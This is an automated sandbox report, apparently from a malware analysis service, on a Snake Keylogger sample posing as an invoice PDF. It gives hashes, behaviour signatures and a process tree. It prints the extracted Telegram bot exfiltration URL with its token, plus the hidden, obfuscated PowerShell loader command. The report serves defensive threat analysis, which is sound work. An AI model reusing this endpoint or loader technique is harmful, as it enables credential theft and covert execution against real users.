Analysis
-
max time kernel
140s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-10-2024 14:20
Static task
static1
Behavioral task
behavioral1
Sample
Factura 1-014685.pdf.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Factura 1-014685.pdf.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$_12_/Ufarligheden.ps1
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
$_12_/Ufarligheden.ps1
Resource
win10v2004-20241007-en
General
-
Target
Factura 1-014685.pdf.exe
-
Size
455KB
-
MD5
64125d381137afda5c8ec6be3865f00b
-
SHA1
2869466fb83c10b3009befce7cfd90e7e819500b
-
SHA256
cb58bf810026a8ee8a4e7dda3a23369f4f3a1170e97010cd45b698dc412a4b4b
-
SHA512
969b559acc761532548b86b22f107c018150f64f2338990b418bd00c8c813a8c85f503e087db15a3e55c50e9fd71f088b203b7e1fb6993f7a279678a1612a0f9
-
SSDEEP
12288:xTMQmUVDbh1VCnBcS1tx7uxr2sN9cdPV+a51:xTMQvpjVCiHig9qPVf
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7635736517:AAHFp6wO5kdpMkKD4zsolwNzrM3D08NLJQw/sendMessage?chat_id=5913849875
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule behavioral2/memory/3128-88-0x0000000001200000-0x0000000002454000-memory.dmp family_snakekeylogger -
Snakekeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 5044 powershell.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 44 3128 msiexec.exe 46 3128 msiexec.exe 48 3128 msiexec.exe 50 3128 msiexec.exe 52 3128 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 43 drive.google.com 44 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3128 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 5044 powershell.exe 3128 msiexec.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\unionizes\impersonal.ini Factura 1-014685.pdf.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 400 3128 WerFault.exe 98 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Factura 1-014685.pdf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 5044 powershell.exe 5044 powershell.exe 5044 powershell.exe 5044 powershell.exe 5044 powershell.exe 5044 powershell.exe 5044 powershell.exe 5044 powershell.exe 5044 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 5044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 5044 powershell.exe Token: SeIncreaseQuotaPrivilege 5044 powershell.exe Token: SeSecurityPrivilege 5044 powershell.exe Token: SeTakeOwnershipPrivilege 5044 powershell.exe Token: SeLoadDriverPrivilege 5044 powershell.exe Token: SeSystemProfilePrivilege 5044 powershell.exe Token: SeSystemtimePrivilege 5044 powershell.exe Token: SeProfSingleProcessPrivilege 5044 powershell.exe Token: SeIncBasePriorityPrivilege 5044 powershell.exe Token: SeCreatePagefilePrivilege 5044 powershell.exe Token: SeBackupPrivilege 5044 powershell.exe Token: SeRestorePrivilege 5044 powershell.exe Token: SeShutdownPrivilege 5044 powershell.exe Token: SeDebugPrivilege 5044 powershell.exe Token: SeSystemEnvironmentPrivilege 5044 powershell.exe Token: SeRemoteShutdownPrivilege 5044 powershell.exe Token: SeUndockPrivilege 5044 powershell.exe Token: SeManageVolumePrivilege 5044 powershell.exe Token: 33 5044 powershell.exe Token: 34 5044 powershell.exe Token: 35 5044 powershell.exe Token: 36 5044 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 4220 wrote to memory of 5044 4220 Factura 1-014685.pdf.exe 92 PID 4220 wrote to memory of 5044 4220 Factura 1-014685.pdf.exe 92 PID 4220 wrote to memory of 5044 4220 Factura 1-014685.pdf.exe 92 PID 5044 wrote to memory of 3128 5044 powershell.exe 98 PID 5044 wrote to memory of 3128 5044 powershell.exe 98 PID 5044 wrote to memory of 3128 5044 powershell.exe 98 PID 5044 wrote to memory of 3128 5044 powershell.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\Factura 1-014685.pdf.exe"C:\Users\Admin\AppData\Local\Temp\Factura 1-014685.pdf.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Buslinien=Get-Content -raw 'C:\Users\Admin\AppData\Local\storsejl\Ufarligheden.Pic';$Bassetter=$Buslinien.SubString(55168,3);.$Bassetter($Buslinien)2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3128 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3128 -s 20204⤵
- Program crash
PID:400
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3128 -ip 31281⤵PID:4296
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
218KB
MD505daeebbd8825dc01afa6d3f3a1dd770
SHA1a5dc1bb6f651b4e3ea43dfefff22b71a8fc00d06
SHA256bedbecba0718aeabee6e986196a8fa791d6b24fc67c0fb7e2beb2325544f9d0d
SHA512dd3d5bfa9cc6e670ddf2050d97c6204fcca53fe75c3e79826296dd69c0dae9808bae87c5edb6ce564f78ee0f0fd798354e8ac6a761c3dd068b6b1165ca09fe1d
-
Filesize
53KB
MD581af4fd82b47873584f160fb4228293a
SHA1656b56b51ec006f0dd660a92a8d270d52ae4fb8d
SHA256f639169cb559cd1866363100feb43da1b170b708623f45b12c0a706e01561ab6
SHA512caa807605ec4b51dc27a2e2a5db33818cebc082c84893d6ea0b588a5d1a4bb80f49ce3d5dae96a1baaa25a64420a2455237ae3b1ee8e3765cb99987f775af406